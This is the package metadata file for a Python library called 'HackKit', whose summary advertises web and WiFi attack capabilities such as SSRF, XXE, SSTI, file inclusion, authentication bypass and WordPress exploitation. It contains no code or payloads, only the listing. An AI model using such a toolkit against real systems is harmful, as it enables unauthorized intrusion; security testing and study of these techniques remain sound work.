Metadata-Version: 2.4
Name: HackKit
Version: 1.0.0
Summary: WiFi, CSRF, LFI/RFI, SSTI, XXE, SSRF, file uploads, directory brute‑force, auth bypass, header analysis, WordPress exploitation, and more. Missing any method is unacceptable — every function below is exhaustively documented with descriptions, parameters, return values, example usage, and a master example for each class demonstrating all capabilities
Author: Mohammad Taha Gorji
Author-email: MohammadTahaGorjiProfile@gmail.com
Classifier: Programming Language :: Python :: 3
Classifier: License :: OSI Approved :: MIT License
Classifier: Operating System :: OS Independent
Requires-Python: >=3.6
License-File: LICENSE
Dynamic: author
Dynamic: author-email
Dynamic: classifier
Dynamic: description
Dynamic: description-content-type
Dynamic: license-file
Dynamic: requires-python
Dynamic: summary
